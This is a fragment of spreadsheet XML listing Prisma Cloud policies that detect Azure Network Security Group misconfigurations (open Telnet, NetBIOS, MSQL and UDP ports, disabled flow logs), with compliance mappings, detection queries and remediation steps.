      <c r="A2343"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GDPR,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PCI DSS v4.0,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CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2343" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2343" s="2" t="inlineStr"/>
      <c r="D2343" t="inlineStr"/>
      <c r="E2343" t="inlineStr"/>
      <c r="F2343" t="inlineStr"/>
      <c r="G2343" t="b">
        <v>1</v>
      </c>
      <c r="H23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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2343" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2343" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on MSQL (TCP Port 4333)</t>
        </is>
      </c>
      <c r="L2343" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2343" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2343" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2343" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2343" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2343" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2343" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2343" t="inlineStr"/>
      <c r="T2343" t="b">
        <v>0</v>
      </c>
      <c r="U2343" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2343" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2343" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on MSQL (TCP Port 4333). Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict MSQL solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2343"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3" t="inlineStr"/>
      <c r="Z2343"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_Port.inRange(4333,4333) or destinationPortRanges[*] contains _Port.inRange(4333,4333) ))] exists</t>
        </is>
      </c>
      <c r="AA2343" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2343" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2343" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-278</t>
        </is>
      </c>
      <c r="AD2343" t="b">
        <v>1</v>
      </c>
      <c r="AE2343" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2343" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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3" t="inlineStr">
        <is>
          <t>5826e50f-2f29-4444-9cad-3bb4e66ee3ca</t>
        </is>
      </c>
      <c r="AI2343" t="inlineStr">
        <is>
          <t>79428a6c-0c5b-42af-a1a5-2f287a984d91</t>
        </is>
      </c>
      <c r="AJ2343" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2343" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2344">
      <c r="A2344" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Azure Security Benchmark (v3), ISO/IEC 27001:2022, CSA CCM v.4.0.1, CSA CCM v.4.0.1, testazure, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, NIST CSF, NYDFS 23 CRR-NY 500.0, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), Telecommunications Security Act - TSA, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, NIST 800-53 Rev 5, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v8.1, CIS v1.1 (Azure), NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST 800-53 Rev 5, CIS v1.3.1 (Azure), Azure Security Benchmark (v2), Azure Security Benchmark (v3), Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, Copy of Azure Security Benchmark (v3), CIS Controls v7.1, NIST CSF, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v8.2 [Deprecated], NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, CSA CCM v.4.0.6, CIS v1.5.0 (Azure) - Level 1, CIS Controls v7.1, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, CIS v2.1.0 (Azure) Level 1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Copy of Azure Security Benchmark (v3), Fedramp (Moderate), CIS v2.0.0 (Azure) Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], Azure Security Benchmark (v3), CSA CCM v.4.0.1, CIS v1.1 (Azure), ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, Copy of Azure Security Benchmark (v3), CIS v1.4.0 (Azure), ISO/IEC 27001:2022, MTSBv2_Azure, PCI DSS v4.0, ISO/IEC 27017:2015, SOC 2, Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated], NIST 800-53 Rev4, CSA CCM v.4.0.1, SOC 2, NIST 800-53 Rev 5, CSA CCM v.4.0.1, PCI DSS v4.0, CSA CCM v.4.0.1, NIST 800-53 Rev 5, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, Copy of Azure Security Benchmark (v3), CIS v1.3.0 (Azure), NIST CSF, ISO/IEC 27002:2013, Copy of CIS Controls v8, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, TX-RAMP Level 1, Azure Security Benchmark (v3), NIST CSF, NIST CSF, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, testazure, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0,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ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, Azure Security Benchmark (v3), ISO/IEC 27001:2022, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2344" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2344" s="2" t="inlineStr"/>
      <c r="D2344" t="inlineStr"/>
      <c r="E2344" t="inlineStr"/>
      <c r="F2344" t="inlineStr"/>
      <c r="G2344" t="b">
        <v>1</v>
      </c>
      <c r="H23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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2344" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2344" t="inlineStr">
        <is>
          <t>Azure Network Security Group having Inbound rule overly permissive to all traffic on UDP protocol</t>
        </is>
      </c>
      <c r="L2344" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2344" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2344" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2344" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2344" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2344" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2344" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2344" t="inlineStr"/>
      <c r="T2344" t="b">
        <v>1</v>
      </c>
      <c r="U2344" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2344" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2344" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSGs) which are overly permissive to all traffic on UDP protocol. A network security group contains a list of security rules that allow or deny inbound or outbound network traffic based on source or destination IP address, port, and protocol. As a best practice, it is recommended to configure NSGs to restrict traffic from known sources, allowing only authorized protocols and ports.</t>
        </is>
      </c>
      <c r="X2344"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and Port ranges OR set the 'Action' to 'Deny' OR 'Delete' the rule based on your requirement.
7. 'Save' your changes. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-udp-services-are-restricted-from-the-internet
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-udp-services-are-restricted-from-the-internet</t>
        </is>
      </c>
      <c r="Y2344" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Network/networkSecurityGroups/securityRules/*' permission. Successful execution will update the network security group to revoke the inbound rule records allowing all traffic from Internet on UDP protocol.",
'impact': 'reject all traffic from Internet on UDP protocol',
'cliScriptTemplate': 'az network nsg rule update --name $ruleName --resource-group $resourceGroup --nsg-name $resourceName --access Deny'</t>
        </is>
      </c>
      <c r="Z2344" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name= 'azure-network-nsg-list' AND json.rule = securityRules[?any((sourceAddressPrefix equals Internet or sourceAddressPrefix equals * or sourceAddressPrefix equals 0.0.0.0/0 or sourceAddressPrefix equals ::/0) and protocol equals Udp and access equals Allow and direction equals Inbound and destinationPortRange contains *)] exists
{"category":"Networking","resourceTypes":["azurerm_network_security_group","azurerm_network_security_rule"]}</t>
        </is>
      </c>
      <c r="AA2344" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2344" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2344" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-187-CKV_AZURE_77</t>
        </is>
      </c>
      <c r="AD2344" t="b">
        <v>1</v>
      </c>
      <c r="AE2344" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2344" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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4" t="inlineStr">
        <is>
          <t>d979e854-a50d-11e8-98d0-529269fb1459</t>
        </is>
      </c>
      <c r="AI2344" t="inlineStr">
        <is>
          <t>d979e41c-a50d-11e8-98d0-529269fb1459</t>
        </is>
      </c>
      <c r="AJ2344" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2344" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2345">
      <c r="A2345"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CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, CIS Controls v8.1, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, NIST CSF v2.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST 800-53 Rev 5, TX-RAMP Level 1, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST CSF, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, PCI DSS v4.0,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PCI DSS v4.0, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MPAA Content Protection Best Practices, Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, NIST 800-53 Rev4, PCI DSS v4.0, CSA CCM v.4.0.1, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev 5, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), PCI DSS v4.0,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MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, GDPR, NIST CSF, SOC 2, NIST CSF, FFIEC, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, PCI DSS v4.0,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PCI DSS v4.0, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2345" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2345" s="2" t="inlineStr"/>
      <c r="D2345" t="inlineStr"/>
      <c r="E2345" t="inlineStr"/>
      <c r="F2345" t="inlineStr"/>
      <c r="G2345" t="b">
        <v>0</v>
      </c>
      <c r="H23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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2345" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2345" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on Telnet (TCP Port 23)</t>
        </is>
      </c>
      <c r="L2345" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2345" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2345" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2345" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2345" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2345" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2345" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2345" t="inlineStr"/>
      <c r="T2345" t="b">
        <v>0</v>
      </c>
      <c r="U2345" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2345" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2345" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on Telnet (TCP Port 23). Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict MySQL solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2345"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5" t="inlineStr"/>
      <c r="Z2345"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_Port.inRange(23,23) or destinationPortRanges[*] contains _Port.inRange(23,23) ))] exists</t>
        </is>
      </c>
      <c r="AA2345" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2345" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2345" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-272</t>
        </is>
      </c>
      <c r="AD2345" t="b">
        <v>1</v>
      </c>
      <c r="AE2345" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2345" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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5" t="inlineStr">
        <is>
          <t>936dd3cb-a9cc-4a13-9a2c-ea5d40856072</t>
        </is>
      </c>
      <c r="AI2345" t="inlineStr">
        <is>
          <t>d148612d-6f2e-455a-89fc-a1e917fa715f</t>
        </is>
      </c>
      <c r="AJ2345" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2345" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2346">
      <c r="A2346"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46" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2346" s="2" t="inlineStr"/>
      <c r="D2346" t="inlineStr"/>
      <c r="E2346" t="inlineStr"/>
      <c r="F2346" t="inlineStr"/>
      <c r="G2346" t="b">
        <v>0</v>
      </c>
      <c r="H23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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2346" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2346" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on NetBIOS (UDP Port 138)</t>
        </is>
      </c>
      <c r="L2346" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2346" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2346" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2346" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2346" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2346" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2346" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2346" t="inlineStr"/>
      <c r="T2346" t="b">
        <v>0</v>
      </c>
      <c r="U2346" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2346" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2346" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on NetBIOS UDP port 138. Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict NetBIOS solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2346"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6" t="inlineStr"/>
      <c r="Z2346"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Udp or protocol equals *) and (destinationPortRange contains _Port.inRange(138,138) or destinationPortRanges[*] contains _Port.inRange(138,138) ))] exists</t>
        </is>
      </c>
      <c r="AA2346" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2346" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2346" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-288</t>
        </is>
      </c>
      <c r="AD2346" t="b">
        <v>1</v>
      </c>
      <c r="AE2346" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2346" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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6" t="inlineStr">
        <is>
          <t>3784cdfd-dd25-4cf3-b506-ad77033ccc35</t>
        </is>
      </c>
      <c r="AI2346" t="inlineStr">
        <is>
          <t>5b2a3e46-799c-4ae7-b918-e4679ade50cb</t>
        </is>
      </c>
      <c r="AJ2346" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2346" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2347">
      <c r="A2347" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), ISO 27002:2022, Australian Energy Sector Cyber Security Framework (AESCSF), New Zealand Information Security Manual (NZISM v3.4), NIST 800-53 Rev4, ISO/IEC 27002:2013, ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, NIST 800-53 Rev 5, PCI DSS v4.0, MITRE ATT&amp;CK v12, NIST 800-53 Rev4, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CIS Controls v8, CSA CCM v.4.0.1, NIST 800-53 Rev 5, GDPR, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, CIS v2.0.0 (Azure) Level 2, CDC NIST 800-53 Rev4, NIST 800-53 Rev4, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, Telecommunications Security Act - TSA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, CSA CCM v4.0.12, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.11.2.0, Fedramp (Moderate), NIST 800-53 Rev 5, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v4.0, SOC 2, Copy of New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, Microsoft Cloud Security Benchmark v1, kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, PIPEDA, NIST CSF, NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, CRI Profile v1.2.1, CSA CCM v.4.0.6, kashan ACSC Information Security Manual (ISM), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, CIS v2.1.0 (Azure) Level 2, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Australian Energy Sector Cyber Security Framework (AESCSF), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2347" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2347" s="2" t="inlineStr"/>
      <c r="D2347" t="inlineStr"/>
      <c r="E2347" t="inlineStr"/>
      <c r="F2347" t="inlineStr"/>
      <c r="G2347" t="b">
        <v>0</v>
      </c>
      <c r="H23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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2347" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2347" t="inlineStr">
        <is>
          <t>Azure Network Watcher Network Security Group (NSG) flow logs are disabled</t>
        </is>
      </c>
      <c r="L2347" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2347" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2347" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2347" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2347" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2347" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2347" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2347" t="inlineStr"/>
      <c r="T2347" t="b">
        <v>0</v>
      </c>
      <c r="U2347" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2347" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2347" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) for which flow logs are disabled. To perform this check, enable this action on the Azure Service Principal: 'Microsoft.Network/networkWatchers/queryFlowLogStatus/action'.
NSG flow logs, a feature of the Network Watcher app, enable you to view information about ingress and egress IP traffic through an NSG. The flow logs include information such as:
- Outbound and inbound flows on a per-rule basis.
- Network interface to which the flow applies.
- 5-tuple information about the flow (source/destination IP, source/destination port, protocol).
- Whether the traffic was allowed or denied.
As a best practice, enable NSG flow logs to improve network visibility.</t>
        </is>
      </c>
      <c r="X2347" t="inlineStr">
        <is>
          <t>To configure Network Watcher Network Security Group (NSG) flow log, follow below URL:
https://docs.microsoft.com/en-us/azure/network-watcher/network-watcher-nsg-flow-logging-portal#enable-nsg-flow-log</t>
        </is>
      </c>
      <c r="Y2347" t="inlineStr"/>
      <c r="Z2347" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-nsg-list' AND json.rule = flowLogsSettings does not exist or flowLogsSettings.enabled is false</t>
        </is>
      </c>
      <c r="AA2347" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2347" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2347" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-300</t>
        </is>
      </c>
      <c r="AD2347" t="b">
        <v>1</v>
      </c>
      <c r="AE2347" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2347" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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7" t="inlineStr">
        <is>
          <t>360ca34f-141e-4772-8e07-52d5a14f2e6f</t>
        </is>
      </c>
      <c r="AI2347" t="inlineStr">
        <is>
          <t>2b871a47-9ad5-4d7b-9613-5d28a6d6d685</t>
        </is>
      </c>
      <c r="AJ2347" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2347" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2348">
